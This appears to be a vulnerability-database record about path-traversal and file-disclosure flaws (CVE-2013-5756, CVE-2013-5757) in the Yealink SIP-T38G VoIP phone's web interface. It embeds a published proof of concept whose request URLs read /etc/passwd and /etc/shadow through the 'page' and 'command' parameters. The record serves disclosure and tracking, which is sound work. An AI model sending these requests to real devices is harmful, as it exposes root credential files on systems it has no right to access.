Details of VAR-E-201406-0112

ID

VAR-E-201406-0112

CVE

cve_id:	CVE-2013-5756	Trust: 2.4
cve_id:	CVE-2013-5757	Trust: 1.3

sources: BID: 68053 // PACKETSTORM: 127095 // EXPLOIT-DB: 33740 // EDBNET: 55160

EDB ID

33740

TITLE

Yealink VoIP Phone SIP-T38G - Local File Inclusion - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 33740

DESCRIPTION

Yealink VoIP Phone SIP-T38G - Local File Inclusion. CVE-2013-5757CVE-2013-5756CVE-108081CVE-108079 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 33740

AFFECTED PRODUCTS

vendor:	yealink	model:	voip phone sip-t38g	scope:	-	version:	-	Trust: 2.1
vendor:	yealink	model:	sip-t38g	scope:	eq	version:	0	Trust: 0.3

sources: BID: 68053 // PACKETSTORM: 127095 // EXPLOIT-DB: 33740 // EDBNET: 55160

EXPLOIT

Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757

Description:

Web interface contain a vulnerability that allow any page to be included.
We are able to disclose /etc/passwd & /etc/shadow

POC:
Using the page parameter (CVE-2013-5756):
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow

Using the command parameter (CVE-2013-5757):
http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")

*By viewing the shadow file we are able to conclude that cgiServer.exx run
under the root privileges. This lead to CVE-2013-5759.

Trust: 1.0

sources: EXPLOIT-DB: 33740

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 33740

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 33740

TYPE

Local File Inclusion

Trust: 1.6

sources: EXPLOIT-DB: 33740 // EDBNET: 55160

CREDITS

Mr.Un1k0d3r

Trust: 0.6

sources: EXPLOIT-DB: 33740

EXTERNAL IDS

db:	NVD	id:	CVE-2013-5756	Trust: 2.4
db:	EXPLOIT-DB	id:	33740	Trust: 1.6
db:	NVD	id:	CVE-2013-5757	Trust: 1.3
db:	EDBNET	id:	55160	Trust: 0.6
db:	PACKETSTORM	id:	127095	Trust: 0.5
db:	BID	id:	68053	Trust: 0.3

sources: BID: 68053 // PACKETSTORM: 127095 // EXPLOIT-DB: 33740 // EDBNET: 55160

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2013-5756	Trust: 2.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-5757	Trust: 1.0
url:	https://www.exploit-db.com/exploits/33740/	Trust: 0.6
url:	http://www.yealink.com/	Trust: 0.3

sources: BID: 68053 // PACKETSTORM: 127095 // EXPLOIT-DB: 33740 // EDBNET: 55160

SOURCES

db:	BID	id:	68053
db:	PACKETSTORM	id:	127095
db:	EXPLOIT-DB	id:	33740
db:	EDBNET	id:	55160

LAST UPDATE DATE

2022-11-21T17:37:22.119000+00:00

SOURCES UPDATE DATE

db:

BID

id:

68053

date:

2014-06-13T00:00:00

SOURCES RELEASE DATE

db:	BID	id:	68053	date:	2014-06-13T00:00:00
db:	PACKETSTORM	id:	127095	date:	2014-06-13T13:51:39
db:	EXPLOIT-DB	id:	33740	date:	2014-06-13T00:00:00
db:	EDBNET	id:	55160	date:	2014-06-13T00:00:00

tag:	exploit	Trust: 0.5
tag:	local	Trust: 0.5
tag:	file inclusion	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE